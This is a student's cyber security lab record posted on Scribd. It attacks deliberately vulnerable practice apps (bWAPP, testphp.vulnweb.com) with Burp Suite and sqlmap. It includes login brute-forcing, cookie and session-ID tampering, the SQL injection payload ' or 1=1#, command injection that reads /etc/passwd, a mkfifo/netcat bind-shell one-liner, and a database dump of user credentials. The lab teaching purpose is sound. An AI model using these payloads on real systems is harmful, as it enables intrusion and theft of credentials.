Scribd Logo
Upload

Welcome to Scribd!

  • Cyber Security Experiments

    Uploaded by

    Ayesha Siddiqua
    12 views22 pages

    Original Title

    cyber security experiments

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    12 views22 pages

    Cyber Security Experiments

    Uploaded by

    Ayesha Siddiqua

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 22

    3) Build a site map using the application mentioned for analysis.

     Site map for “testphp.vulnweb.com” using Burp suite.


    4) Experiment to perform web application mirroring using
    “Httrack”.
     Mirroring website with url=”https://mdmusaibali.github.io/Travella”

    Step1) Open HTTrack and click next to start a new project.

    Step2) Give a project name and choose a path to store your


    downloaded files and click next.

    Step3) Press “Add URL” button and paste the url of website to
    download. Then click ok.
    Step 4) Once the url is added click next.

    Step 5) Keep the settings at default and click next.


    Step 6) Wait until the website is being downloaded.

    Step 7) You can check out the website using the html document in
    your download location.
    5) Build a checklist for authentication and apply on the web
    application to analyze the outcomes.
     Authentication Bypass via Brute force
    Turn on intercept in burp suite and login with any username or password on
    the login form.

    Send the response to intruder for brute force attack


    Clear payload points to save time.

    Add only 2 payload points i.e username and password.


    Set attack type to cluster bomb to check all permutations.

    Add possible username, passwords or a list to payload set 1 as well as payload


    set 2 and start the attack.
    We now have a successful 302 status for payload 1 and 2 as “admin”.
    Let’s test this info on our login page.

    Authentication Bypass via Cookies


    Set any username or password and press login button with intercept on.
    Add a new parameter with name=”uid” and Value=”1” and forward the
    request.

    We are logged in.


    Authentication Bypass via SQL injection
    A simple ‘ or 1=1# payload is enough to log us in as admin.
    6) Build a checklist for session management and use the same to
    perform manual checks on the application.
     Session Mgmt. – Administrative Portals
    Although the page is locked, we can alter the admin value in url.

    Once we do that the page is unlocked.


    Session Mgmt. – Cookies (HTTPOnly)
    Open bWapp on chrome browser or any other browser. Log in as bee/bug and
    check PHPSESSID by clicking Cookies button. Copy that PHPSESSID and paste it
    somewhere.

    Now open your Kali linux and open both burp suite and BWapp.
    But this time create a new user and log in with it. Turn on intercept and click
    Cookies button.
    Change the PHPSSID on burp suite and turn off the intercept.
    Once you do that you are logged into some other session.

    Session Mgmt. – Cookies (Secure)


    This can be hacked using the same method used in previous section.

    Session Mgmt. – Session ID in URL


    The PHPSSID is already exposed in URL.
    Just do the same process as previous section, except that you won’t need burp
    suite to paste the other session id. You can just paste the other session id in
    the URL .

    Session Mgmt. – Strong Session


    This vulnerability seems to be common as well. (not sure)
    8) Experiment to perform SQL and NoSQL injection in application
    using manual and automated tools.
     Manual Method
    A simple ‘or 1=1# payload can expose all the secure data from servers.

    Automated Method (Usingsqlmap)


    Content on page 19
    9) Experiment to perform OS command injection in application and
    extend the attack to gain web shell access.

     Experimenting OS command injection


    We can use “;” to end the search and start our new command.
    For example:
    ; cat /etc/passwd
    Trying to gain shell access
    Lets get a shell using sh and listen using netcat at port 4444.
    To run shell and listen to the port simultaneously we need to pipe them in a
    file using mkfifo .
    So we’ll be using this command:
    www.google.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

    Now return to kali linux and open terminal.


    Type:
    nc 192.168.29.185 4444
    to connect to port 4444 and get shell access.
    10) Build a checklist for file path traversal to access the server internal
    files.
     Pages are exposed in URL itself

    Adding a payload to URL we can access server internal files.


    ENUMERATION USING SQLMAP (AUTOMATED)
    Tried to get list of databases using –dbs option in sqlmap.
    The results asked me to add cookies and also give parameters.

    Tried to find any clue in -h section and got to know that I can add cookies and parameters to
    the command using –cookies and –data option.
    Extracted cookies and data from Burpsuite

    Used those cookies and data in sqlmap and tried to find databases.

    Results:

    Results indicated that there was only one database i.e information_schema, although the
    database “information_schema” was the default database made by Mysql. This seemed fishy.
    Tried to get the current database being used through –current-db command.

    Results:

    Results indicated that current database was “bwapp” which was contrary to the previous
    result saying there was only one database.
    Although it wasn’t a good idea, tried to dump the databases to see if I find something new.

    Results:

    Results gave the tables of our current database i.e “bwapp” along with columns of table
    named “blog” inside “bwapp”.

    Then tried to find columns from table “users” through –column option selecting the “bwapp”
    database using -D and “users” table using -T because it sounded as if it had something
    important.

    Results:
    Results displayed the columns from the table “user”.

    Tried dumping few columns to find the credentials (if available).

    Results:

    Exposed all the emails along with login id and password.

    You might also like